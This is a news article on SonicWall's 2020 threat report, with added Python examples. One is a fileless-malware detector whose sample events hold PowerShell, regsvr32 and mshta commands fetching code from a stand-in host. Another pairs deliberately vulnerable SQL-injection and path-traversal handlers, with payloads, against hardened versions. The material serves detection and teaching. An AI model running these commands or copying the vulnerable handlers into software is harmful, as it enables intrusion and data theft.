IoT is a gold mine for hackers using fileless malware for cyberattacks

Data exposure is one of the biggest threats from attacks on IoT devices. A new report recommends a shift to perimeter-less security strategies.


In 2019, security teams made progress in the adoption of perimeter-less security while hackers increased the use of fileless malware and IoT malware.  

The 2020 SonicWall Cyber Threat Report highlights the tactics hackers are using to gain unauthorized access to data, as well as what security teams are doing to protect it. The good news is that SonicWall's researchers found a 6% decrease in overall malware attacks in 2019, with 9.9 billion incidents recorded, compared to 10.5 billion in 2018.

The report also compiled the worst data leaks of the year. IoT company Orvibo had the biggest data exposure, with two billion records. The company makes an all-in-one control panel for smart devices, a smart door lock, a light-switch controller, and an air-conditioning control set.


Biggest data losses

According to the report, Facebook was responsible for almost all of the social media data losses, while the First American and Capital One breaches accounted for the banking category. Biometrics and security company Suprema lost control of 27 million records.

The largest data exposures by industry, according to the SonicWall report, were:

  1. IoT, 2 billion records (1 breach)
  2. Social media, 1.4 billion records (7 breaches)
  3. Banking/credit/finance, 1.1 billion records (4 breaches)
  4. Business, 984 million records (4 breaches)
  5. Technology, 817 million records (4 breaches)
  6. Entertainment, 271 million records (3 breaches)
  7. Education, 139 million records (1 breach)
  8. Retail, 73 million records (2 breaches)
  9. Healthcare, 42 million records (7 breaches)

The SonicWall report described advances in perimeter-less security, a new way of thinking about how to keep threats out.

Now that the attack surface is expanding fast in every direction, companies should rethink their defense strategies, according to SonicWall. This means taking a comprehensive approach to security instead of a segmented one.


The report authors suggest that the zero-trust security model should evolve into a secure access service edge (SASE), a term coined in 2019 by Gartner security analysts Neil MacDonald, Lawrence Orans and Joe Skorupa. A SASE platform combines software- and service-based networking with security functions, unifying what are today separate security products.

The report authors state that this perimeter-less security movement could also replace VPNs and firewall technology to provide "greater network visibility, seamless onboarding, and full compatibility with all major cloud providers."

On the offense side, hackers focused their efforts last year on these techniques:

  • Encrypted threats
  • Fileless malware
  • IoT malware
  • Web app attacks

Here is a brief recap of each threat.

Fileless malware cyberattacks

Fileless malware does not write a malicious executable to the computer's hard drive; it runs in memory, typically by abusing legitimate system tools such as PowerShell or Windows Management Instrumentation. That makes it hard for file-centric defenses such as file-based whitelisting, signature detection, pattern analysis and hardware verification to stop it.

The most common fileless malware in 2019 were:

  • Astaroth Backdoor Trojan
  • Divergent
  • IcedID Banking Trojan
  • GandCrab Ransomware
  • Kovter
  • Nodersok
  • PCASTLE Monero-Mining Malware
  • Ursnif Banking Trojan

SonicWall researchers found that fileless malware incidents spiked between May and September before trailing off for the rest of the year.
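A detector for the evasion the report describes, as an added example that is not code from the article or from SonicWall: because there is no malicious file to hash or whitelist, it inspects command lines and parent/child process relationships in constructed Sysmon-style process-creation events. The event lines, the 203.0.113.10 address and the rule names are all made up for the illustration.

```python
"""Flag fileless-execution indicators in process-creation telemetry.

Added example; not code from the article or the SonicWall report. Fileless
malware leaves no malicious executable to hash or whitelist, so this looks
instead at the command lines and parent/child relationships of the built-in
Windows tools it abuses (PowerShell, mshta, regsvr32, rundll32, WMI). The
event lines are constructed in a simplified Sysmon Event ID 1 style.
"""
import base64
import re

# Constructed payload: a PowerShell download cradle, encoded the way
# "powershell -EncodedCommand" expects it (base64 of UTF-16LE text).
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
CRADLE_ENCODED = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    "ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    f"CommandLine=powershell.exe -NoP -W Hidden -Enc {CRADLE_ENCODED}",
    "ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\regsvr32.exe "
    "CommandLine=regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll",
    "ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe "
    "CommandLine=mshta.exe http://203.0.113.10/p.hta",
    "ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\wbem\\wmic.exe "
    "CommandLine=wmic /node:fileserver01 process call create \"powershell -NoP -c whoami\"",
    # Benign: a scheduled script run from disk, no encoding, no download cradle.
    "ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
]

# Key=value fields; paths may contain spaces, so stop only before the next key.
FIELD = re.compile(r"(ParentImage|Image|CommandLine)=(.*?)(?=\s(?:ParentImage|Image|CommandLine)=|$)")

# Command-line patterns for the living-off-the-land tools fileless malware abuses.
RULES = [
    ("encoded_powershell",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+(?:https?:|javascript:|vbscript:)", re.I)),
    ("regsvr32_scriptlet", re.compile(r"regsvr32(?:\.exe)?\b.*\s/i:https?://.*scrobj\.dll", re.I)),
    ("rundll32_script", re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I)),
    ("wmi_process_create", re.compile(r"wmic(?:\.exe)?\b.*process\s+call\s+create", re.I)),
]
DOWNLOAD_CRADLE = re.compile(
    r"IEX|Invoke-Expression|DownloadString|DownloadData|FromBase64String|Net\.WebClient", re.I)
ENCODED_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}


def parse_event(line):
    """Split one constructed event line into its named fields."""
    return {key: value for key, value in FIELD.findall(line)}


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE), or return None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line):
    """Return the child image, the list of triggered rule names and any decoded payload."""
    event = parse_event(line)
    cmd = event.get("CommandLine", "")
    findings = [name for name, pattern in RULES if pattern.search(cmd)]
    decoded = decode_encoded_command(cmd)
    # The cradle may sit in the clear or only inside the base64 blob; check both.
    if DOWNLOAD_CRADLE.search(cmd) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
        findings.append("download_cradle")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    child = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    # An Office document spawning a script host is the classic macro-to-memory hand-off.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    return {"image": child, "findings": findings, "decoded": decoded}


def analyze_all(lines):
    return [analyze(line) for line in lines]


if __name__ == "__main__":
    for result in analyze_all(SAMPLE_EVENTS):
        print(f"{result['image']:<15} {', '.join(result['findings']) or 'no findings'}")
```

The point of the parent/child rule is that none of the five processes is malicious on its own; only the combination of who launched it and what it was asked to run separates the Word-spawned encoded PowerShell from the scheduled backup script, which the same code leaves alone.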

Encrypted threats

This type of attack is also good at slipping past traditional defenses. Delivering malware over encrypted traffic works for threat actors because many firewall appliances lack the capability, or the processing power, to decrypt, inspect and mitigate threats carried in HTTPS traffic.

In 2019, SonicWall Capture Labs threat researchers recorded 3.7 million malware attacks sent over transport layer security (TLS) and secure sockets layer (SSL) traffic, a 27.3% year-over-year increase. SonicWall predicts this attack vector will increase in the future.
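To make concrete what an appliance sees when it does not decrypt, here is an added example (not from the article or the SonicWall report) that builds a minimal TLS 1.2 ClientHello and pulls out the Server Name Indication, the one hostname-level field a firewall can read before the session turns to ciphertext. The hostnames and handshake bytes are constructed for the illustration.

```python
"""Extract the SNI hostname from a TLS ClientHello.

Added example; not from the article or SonicWall. A firewall that does not
terminate TLS sees this much of an HTTPS session: the hostname in the
unencrypted ClientHello (plus certificate metadata and flow sizes). Everything
after the handshake is ciphertext, which is why payload inspection of HTTPS
requires decryption and the processing budget that goes with it. The
ClientHello bytes are constructed by build_client_hello(), not captured.
"""
import struct

TLS_HANDSHAKE = 0x16
TLS_APPLICATION_DATA = 0x17
HS_CLIENT_HELLO = 0x01
EXT_SERVER_NAME = 0x0000


def build_client_hello(server_name=None):
    """Minimal TLS 1.2 ClientHello record; the SNI extension is added when requested."""
    extensions = b""
    if server_name is not None:
        host = server_name.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(host)) + host      # name_type 0 = host_name
        sni_list = struct.pack("!H", len(entry)) + entry
        extensions += struct.pack("!HH", EXT_SERVER_NAME, len(sni_list)) + sni_list
    # An unrelated extension (supported_groups) so the parser has to skip one.
    groups = struct.pack("!HHH", 4, 0x001D, 0x0017)
    extensions += struct.pack("!HH", 0x000A, len(groups)) + groups

    body = struct.pack("!H", 0x0303)                    # client_version = TLS 1.2
    body += bytes(32)                                   # client random (zeros; constructed)
    body += b"\x00"                                     # empty session_id
    suites = struct.pack("!HH", 0xC02F, 0xC030)
    body += struct.pack("!H", len(suites)) + suites     # cipher_suites
    body += b"\x01\x00"                                 # compression_methods: null only
    body += struct.pack("!H", len(extensions)) + extensions
    handshake = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record):
    """Return the host_name from a ClientHello's SNI extension, or None.

    None for anything that is not a ClientHello (for example encrypted
    application data) or for a ClientHello without SNI; ValueError on
    truncated or malformed input.
    """
    if len(record) < 5 or record[0] != TLS_HANDSHAKE:
        return None
    (rec_len,) = struct.unpack("!H", record[3:5])
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != HS_CLIENT_HELLO:
        return None
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated ClientHello")
    try:
        pos = 2 + 32                                              # skip version and random
        pos += 1 + body[pos]                                      # session_id
        pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]      # cipher_suites
        pos += 1 + body[pos]                                      # compression_methods
        if pos + 2 > len(body):
            return None                                           # no extensions block
        (ext_len,) = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            ext_type, length = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            data = body[pos:pos + length]
            pos += length
            if ext_type != EXT_SERVER_NAME:
                continue
            (list_len,) = struct.unpack("!H", data[:2])
            off = 2
            while off + 3 <= 2 + list_len:
                name_type = data[off]
                (name_len,) = struct.unpack("!H", data[off + 1:off + 3])
                off += 3
                if name_type == 0:
                    return data[off:off + name_len].decode("ascii")
                off += name_len
    except (struct.error, IndexError) as exc:
        raise ValueError("malformed ClientHello") from exc
    return None


if __name__ == "__main__":
    print(extract_sni(build_client_hello("updates.example.net")))                # updates.example.net
    print(extract_sni(build_client_hello()))                                     # None
    print(extract_sni(bytes([TLS_APPLICATION_DATA, 3, 3, 0, 5]) + b"\xde\xad\xbe\xef\x00"))  # None
```

SNI is enough to block a known-bad hostname, but it says nothing about the bytes that follow; the third call shows an application-data record, which is all a non-decrypting appliance ever sees of the actual payload.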

IoT attacks

The SonicWall researchers found a 5% increase in IoT malware, with 34.3 million attacks recorded during 2019.

The report lists common IoT security weaknesses as weak or hard-coded passwords, insecure networks and interfaces, and lack of secure update mechanisms.

Check Point Research has just disclosed a vulnerability in Philips Hue smart bulbs. A flaw in the firmware lets an attacker take control of an individual bulb, push malicious firmware to it, and use the compromised bulb to spread further malware across the network. The attack abuses Zigbee, the low-power IoT protocol that Philips and many other IoT manufacturers use for device communication.

It seems obvious, but it's worth repeating this observation from the report: "Given the tenuous landscape regarding data privacy, and the fact that everything from nanny cams to doorbells are connected, IoT-focused attacks will only increase in 2020 and beyond."

App attacks

For 2019, SonicWall Capture Labs threat researchers recorded a 52% year-over-year increase in web app attacks and found that the attacks are getting more sophisticated.

Volume was largely flat until May, but SonicWall recorded spikes across the final seven months of the year that pushed total web app attack volume past 40 million.

Currently, the most common web attacks include SQL injection, directory traversal, cross-site scripting (XSS), broken authentication and session management, cross-site request forgery (CSRF), security misconfiguration and sensitive data exposure.

SonicWall lists these as the top WAF attack signatures of 2019:

  • Bash Code Injection
  • Blind SQL Injection Attack Variant 12
  • Cross-site Scripting (XSS) Attack
  • PHP NULL Poisoning
  • SQL Injection Attack 1
  • SQL Injection Attack 11
  • Unauthorized Remote File Access
  • Web Application Directory Traversal Attack 1
  • Web Application Directory Traversal Attack 5
  • Web Application Directory Traversal Attack 6

Many organizations are adding web application firewalls to their defenses to harden their overall security posture.
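Three of the attack classes in SonicWall's signature list above (SQL injection, directory traversal and the null-byte truncation trick behind the "PHP NULL Poisoning" signature) are shown below in vulnerable and hardened form, as an added example. It is not code from the article, from SonicWall or from any real application; the database rows and the web-root file map are constructed for the illustration.

```python
"""Vulnerable and hardened handlers for SQL injection and directory traversal,
including the NUL-byte truncation trick behind the "PHP NULL Poisoning" WAF
signature.

Added example; not code from the article, SonicWall, or any real application.
The user rows and the web-root file map are constructed here so it runs offline.
"""
import posixpath
import sqlite3


def make_db():
    """In-memory SQLite database with two constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def find_user_vulnerable(conn, username):
    """String-builds the query, so the input can rewrite the WHERE clause."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Binds the value as a parameter; it is data to the engine, never SQL syntax."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


WEB_ROOT_FILES = {  # constructed stand-in for files on disk (path -> contents)
    "public/index.html": b"<html>welcome</html>",
    "public/img/logo.png": b"\x89PNG\r\n\x1a\n",
    "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
}
ALLOWED_EXTENSIONS = (".html", ".png")


def serve_vulnerable(name):
    """Intended rule: serve only .html/.png files below public/.

    Two defects: no check that the normalised path stays under the root, and
    the lookup emulates a C-string file API that stops at the first NUL byte,
    so 'x\\x00.png' passes the extension check but opens 'x'.
    """
    if not name.lower().endswith(ALLOWED_EXTENSIONS):
        return None
    effective = name.split("\x00", 1)[0]
    return WEB_ROOT_FILES.get(posixpath.normpath("public/" + effective))


def serve_safe(name):
    """Rejects NUL bytes, normalises, then confirms containment under public/."""
    if "\x00" in name:
        raise ValueError("NUL byte in path")
    if not name.lower().endswith(ALLOWED_EXTENSIONS):
        raise ValueError("extension not allowed")
    # join() discards the root for absolute input and normpath() resolves '..',
    # so the containment check below sees the path the filesystem would open.
    path = posixpath.normpath(posixpath.join("public", name))
    if not path.startswith("public/"):
        raise ValueError("path escapes web root")
    return WEB_ROOT_FILES.get(path)


def safe_rejects(name):
    """True when serve_safe refuses the request."""
    try:
        serve_safe(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, "' OR '1'='1"))    # every row
    print(find_user_safe(db, "' OR '1'='1"))          # []
    print(serve_vulnerable("../etc/passwd\x00.png"))  # contents of etc/passwd
    print(safe_rejects("../etc/passwd\x00.png"))      # True
```

A WAF signature catches the `' OR '1'='1` and `../` strings on the wire, but the hardened handlers stop the same requests without any pattern matching: parameter binding and a post-normalisation containment check remove the ambiguity the attacks depend on, which is why the firewall is best treated as a second layer rather than the fix.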
